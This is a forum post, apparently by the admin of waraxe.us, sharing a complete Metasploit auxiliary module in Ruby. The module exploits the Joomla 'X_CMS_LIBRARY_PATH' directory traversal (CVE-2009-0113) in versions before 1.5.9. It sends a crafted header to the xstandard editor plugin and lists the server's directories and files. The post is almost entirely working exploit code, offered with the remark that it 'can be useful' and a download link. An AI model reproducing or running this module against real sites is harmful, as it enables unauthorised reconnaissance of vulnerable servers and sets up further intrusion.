| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
 |
|
 |
|
Most of affected Joomla installations are allready patched, because this vulnerability is almost three months old.
Anyway, this exploit can be useful :)
Feedback is welcome!
http://www.waraxe.us/tools/metasploits/joomla_dir_structure.rb
| Code: |
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla "X_CMS_LIBRARY_PATH" Directory Traversal Vulnerability',
'Description' => %q{
This module exploits an "X_CMS_LIBRARY_PATH" Directory Traversal Vulnerability in the
Joomla CMS versions < 1.5.9
},
'Author' => 'Janek Vind "waraxe" <come2waraxe[at]yahoo.com>',
'License' => MSF_LICENSE,
'Version' => '0.90',
'References' =>
[
['BID', '33143'],
['CVE', '2009-0113'],
['MIL', '7691'],
['URL', 'http://developer.joomla.org/security/news/288-20090102-core-plgxstandard-directory-traversal.html']
],
'DisclosureDate' => 'Jan 09 2009'))
register_options(
[
OptString.new('URI', [false, 'Path to Joomla', '']),
OptString.new('FOLDER', [true, 'Folder to explore', '../../']),
], self.class)
end
def run
target_uri = '/' + datastore['URI'] + '/plugins/editors/xstandard/attachmentlibrary.php'
target_uri = target_uri.gsub(/\/{2,}/, '/')
target_folder = datastore['FOLDER']
target_folder = target_folder.gsub(/\/{2,}/, '/')
print_status("URI: #{target_uri}")
print_status("Folder: #{target_folder}")
res = send_request_cgi({
'uri' => target_uri,
'method' => 'GET',
'headers' =>
{
'Connection' => 'Close',
'X_CMS_LIBRARY_PATH' => target_folder
}
}, 30)
if (res)
print_status("Server returned: #{res.code} #{res.message}")
if(res.code == 200)
if(res.body.include? '<library>')
found = false
arr_dirs = res.body.scan(/<baseURL>([^<]+)<\/baseURL>/m)
if(arr_dirs.length > 0)
found = true
out = "\nDirectories:\n====================\n"
arr_dirs.each do |arr2|
dname = Rex::Text.uri_decode(arr2[0])
dname = dname.gsub('//','/')
dname = dname.gsub('images/stories/','')
out += dname + "\n"
end
end
arr_files = res.body.scan(/<value>([^<]+\.[^<]{3,4})<\/value>/m)
if(arr_files.length > 0)
found = true
out += "\nFiles:\n====================\n"
arr_files.each do |arr2|
dname = Rex::Text.uri_decode(arr2[0])
dname = dname.gsub('//','/')
dname = dname.gsub('images/stories/','')
out += dname + "\n"
end
end
if(found)
print_status(out)
else
print_status('No directories or files in response')
end
else
print_error('Invalid response, exploit failed')
end
else
print_error('Invalid response code, exploit failed')
end
else
print_error('No response from the server')
end
end
end
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9145
People Online:
Visitors: 458
Members: 0
Total: 458
